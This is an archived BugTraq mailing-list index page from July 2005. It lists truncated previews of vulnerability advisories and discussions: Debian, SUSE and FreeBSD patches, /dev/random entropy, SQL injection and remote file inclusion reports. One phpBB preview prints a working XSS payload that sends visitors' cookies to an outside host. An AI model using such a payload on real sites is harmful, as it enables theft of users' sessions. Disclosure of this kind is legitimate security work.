BugTraq Mode:
(Page 1311 of 1748)  < Prev  1306 1307 1308 1309 1310 1311 1312 1313 1314 1315 1316  Next >
Re: /dev/random is probably not 2005-07-06
devnull Rodents Montreal QC CA
[The From: address is a bitbucket, to deflect the autoresponder hordes.
Use the address in the signature to reach me.]

> Why anyone is using the old entropy based RNG at all on modern
> commodity hardware?

Who said anything about "modern commodity hardware"? :)

Not all machines running most of th

[ more ]  [ reply ]
Re: /dev/random is probably not 2005-07-06
devnull Rodents Montreal QC CA
[The From: is a bitbucket, to deflect the hordes of broken
autoresponders. Use the address in the signature to reach me.]

> The original email pointed out that disk seek times may not be quite
> as random as previously thought, especially with compact flash and
> similar mediums.

According to the

[ more ]  [ reply ]
Re: /dev/random is probably not 2005-07-05
ChayoteMu (chayotemu gmail com)
It's not necessarily the traffic itself, but aspects of the traffic.
Someone had mentioned that the timing between recieving the packets
was what's used, even if you see that it may change over the rest of
the wire and there's nothing to say that the system is using all the
traffic as the attacker s

[ more ]  [ reply ]
VoIP-Phones: Weakness in proccessing SIP-Notify-Messages 2005-07-06
Tobias Glemser (tglemser tele-consulting com)
Tele-Consulting GmbH
security | networking | training

advisory 05/07/06

URL of this advisory:
http://pentest.tele-consulting.com/advisories/05_07_06_voip-phones.txt

Topic:
Weakness in implemenation of proccessing SIP-Notify-Messages
in VoIP-Phones.

Summary:
Due to ignoring

[ more ]  [ reply ]
Re: Microsoft Internet Explorer "javaprxy.dll" Code Execution Exploit 2005-07-05
berendjanwever gmail com
Thanks you all for notifying the frsirt team of their credit/copyright missteps, they seem to have corrected this on their website. I would like to request any exploit archive to reflect their changes and warn any developers that the code is under GPL and any work based on it will therefore also be

[ more ]  [ reply ]
Advisory 07/2005: Jaws Multiple Remote Code Execution Vulnerabilities 2005-07-06
Stefan Esser (sesser hardened-php net)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hardened-PHP Project
www.hardened-php.net

-= Security Advisory =-

Advisory: Jaws Multiple Remote Code Execution Vulnerabilities
Release Date: 2005/07/06
Last Modified: 200

[ more ]  [ reply ]
[SECURITY] [DSA 738-1] New razor packages fix potential DOS 2005-07-05
Michael Stone (mstone klecker debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------

Debian Security Advisory DSA 738-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Michael Stone
July 05, 2005

[ more ]  [ reply ]
Solaris Socket Hijack 2005-07-06
c0ntexb gmail com
/*
************************************************************************
*****************************************
$ An open security advisory #7 - SUN Solaris SO_REUSEADDR Local Socket Hijack Bug
************************************************************************
**********************

[ more ]  [ reply ]
[SECURITY] [DSA 740-1] New zlib packages fix denial of service 2005-07-06
Michael Stone (mstone klecker debian org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------

Debian Security Advisory DSA 740-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Michael Stone
July 06, 2005

[ more ]  [ reply ]
GNATS - gen-index 2005-07-06
pi3ki31ny wp pl
Name: GNATS - gen-index
Vendor URL: http://www.gnu.org/software/gnats
Author: Adam Zabrocki <pi3ki31ny (at) wp (dot) pl [email concealed]>
Date: June 16, 2005

Issue:

GNATS - the GNU problem report management system allows attacker to overwr

[ more ]  [ reply ]
FreeBSD Security Advisory FreeBSD-SA-05:16.zlib 2005-07-06
FreeBSD Security Advisories (security-advisories freebsd org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

========================================================================
=====
FreeBSD-SA-05:16.zlib Security Advisory
The FreeBSD Project

Topic: Bu

[ more ]  [ reply ]
SUSE Security Announcement: heimdal telnetd remote buffer overflow (SUSE-SA:2005:040) 2005-07-06
Marcus Meissner (meissner suse de)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________
______

SUSE Security Announcement

Package: heimdal
Announcement ID: SUSE-SA:2005:040
Date:

[ more ]  [ reply ]
SUSE Security Announcement: zlib denial of service attack (SUSE-SA:2005:039) 2005-07-06
Marcus Meissner (meissner suse de)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________
______

SUSE Security Announcement

Package: zlib
Announcement ID: SUSE-SA:2005:039
Date: We

[ more ]  [ reply ]
McAfee Intrushield IPS Abuse 2005-07-06
c0ntexb gmail com
/*
************************************************************************
*****************************************
$ An open security advisory #8 - McAfee Intrushield IPS Management Console Abuse
************************************************************************
***********************

[ more ]  [ reply ]
Passwords in RAM dumps [formally Novell GroupWise Plain TextPassword Vulnerability.] 2005-07-04
Anything But Microsoft (abm anythingbutmicrosoft org) (1 replies)
App after app tested by me here finds my user name and password in memory. Two apps out of fourteen tested stored the password in RAM with some type of hash. But I wouldn't be surprised if this was easily translated.

I've only looked at the running process of five apps on Linux so far but have yet

[ more ]  [ reply ]
Re: /dev/random is probably not 2005-07-05
Robert Foxworth (rfoxwor1 tampabay rr com)


> Charles M. Hannum wrote:
> > Most implementations of /dev/random (or so-called "entropy gathering
daemons")
> > rely on disk I/O timings as a primary source of randomness. This is
based on
> > a CRYPTO '94 paper[1] that analyzed randomness from air turbulence
inside the
> > drive case.

At the

[ more ]  [ reply ]
Imail Cookie Vulnerability (unhashed) 2005-07-05
Sintigan insecure net
Neither Regular or secure mode of Imail properly give out a hash on cookies leaving the cookies straight readable to any onlookers.

No exploit is needed
POC:

"IMail_UserId
1006332dgd2@Someserver"
--------------------------
"IMail_password
1234"

Straight From Cookie ^^ (edited to protect user)

S

[ more ]  [ reply ]
ekg insecure temporary file creation and arbitrary code execution 2005-07-05
ZATAZ Audits (exploits zataz net)
#########################################################

ekg insecure temporary file creation and arbitrary code execution

Vendor: http://dev.null.pl/ekg/
Advisory: http://www.zataz.net/adviso/ekg-06062005.txt
Vendor informed: yes
Exploit available: no
Impact : high
Exploitation : high

#########

[ more ]  [ reply ]
[covide] possible sql injection 2005-07-05
Hans Wolters (hans wolters xs4all nl)

Summary:

Covide, a webbased groupware application has had a problem where it was possible to inject
sql due to special crafted urls. This made it possible to change the user id once logged in.

Solution provided to the authors:

Type cast the queries where possible and check user input to see if i

[ more ]  [ reply ]
XSS in nested tag in phpbb 2.0.16 2005-07-05
alex (pigrelax yandex ru)
Hi all!

Example:

[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'
styl
e='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://a
ntic
hat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;
][/u
rl][/url]'[/color]

More info:
http://www.security

[ more ]  [ reply ]
MyGuestbook Remote File Inclusion. 2005-07-05
group (at) soulblack.com (dot) ar [email concealed] (group soulblack com ar)
===========================================================

============================================================
Title: MyGuestbook Remote File Inclusion.
Vulnerability Discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 05/07/2005
Severity: High. Remote Users Can Execu

[ more ]  [ reply ]
[badroot security] probe.cgi: Remote Command Execution 2005-07-05
mozako (mozako mybox it)
___________________________________________________________

BADROOT SECURITY GROUP
Security Advisory 2005 - #0x06
http://www.badroot.org
irc.us.azzurra.org ~ #badroot
___________________________________________________________

Authors ....... spher3 (spher3 at fatalimpulse dot net) Date
........

[ more ]  [ reply ]
Re: [badroot security] AutoIndex PHP Script: XSS vulnerability 2005-07-05
mozako (mozako mybox it)
Sorry for distraction errors.
This is the correct ADV:

_______________________________________________________

BADROOT SECURITY GROUP
Security Advisory 2005-#0x07
http://www.badroot.org
irc.us.azzurra.org ~ #badroot
_______________________________________________________

Authors ....... mozako f

[ more ]  [ reply ]
iDEFENSE Security Advisory 07.05.05: Adobe Acrobat Reader UnixAppOpenFilePerform() Buffer Overflow Vulnerability 2005-07-05
iDEFENSE Labs (labs-no-reply idefense com)
Adobe Acrobat Reader UnixAppOpenFilePerform() Buffer Overflow
Vulnerability

iDEFENSE Security Advisory 07.05.05
www.idefense.com/application/poi/display?id=279&type=vulnerabilities
July 05, 2005

I. BACKGROUND

Adobe Acrobat Reader is a program for viewing Portable Document Format
(PDF) documents.

[ more ]  [ reply ]
Re: Microsoft Internet Explorer "javaprxy.dll" Code Execution Exploit 2005-07-05
give_credit where_credit_is_due fr
Although I respect these Frenchies for their "attempt" to make the Internet safer, I denounce them for failing miserably. I think it's worth noting that they stole Skylined's code, stripped it of the GPL, the comments, and the credit, only to make themselves look better. This is the original script:

[ more ]  [ reply ]
(Page 1311 of 1748)  < Prev  1306 1307 1308 1309 1310 1311 1312 1313 1314 1315 1316  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus